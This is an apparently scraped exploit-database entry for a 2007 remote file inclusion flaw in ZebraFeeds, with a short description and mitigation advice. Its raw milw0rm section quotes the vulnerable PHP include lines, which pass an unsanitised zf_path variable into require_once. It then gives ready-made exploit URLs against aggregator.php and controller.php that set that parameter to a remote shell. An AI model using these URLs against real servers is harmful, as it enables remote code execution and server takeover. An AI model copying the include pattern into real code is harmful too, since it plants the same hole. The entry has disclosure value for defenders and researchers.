header-logo
Suggest Exploit
vendor:
Unknown
by:
ThE dE@Th (AsB-MaY DiScOvEr ExPlIoTs Gr0uP)
5.5
CVSS
MEDIUM
Remote File Inclusion
98
CWE
Product Name: Unknown
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Remote File Inclusion in aggregator.php and controller.php

The vulnerability allows an attacker to include a remote file in the aggregator.php and controller.php scripts. By manipulating the 'zf_path' parameter, an attacker can execute arbitrary code on the server.

Mitigation:

Update the affected scripts to ensure that user input is properly validated and sanitized before including files.
Source

Exploit-DB raw data:

To ConTacT mE @ wWw.Asb-May.net/bb
ScRiPt:-http://cazalet.org/zebrafeeds/releases/zebrafeeds-current.zip
Discovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs Gr0uP}>>
******************************************************************************
aggregator.php:-
require_once($zf_path . 'includes/feed.php');
require_once($zf_path . 'includes/view.php');
require_once($zf_path . 'includes/template.php');
require_once($zf_path . 'magpierss/rss_fetch.inc');

controller.php:-
require_once($zf_path . 'includes/template.php');
require_once($zf_path . 'includes/opml.php');

********************************************************************************
ExPlOiT:-http://www.SitE.com/newsfeeds/includes/aggregator.php?zf_path=[Shell]
ExPlOiT:-http://www.SitE.com/newsfeeds/includes/controller.php?zf_path=[Shell]
*******************************************************************************

# milw0rm.com [2007-02-15]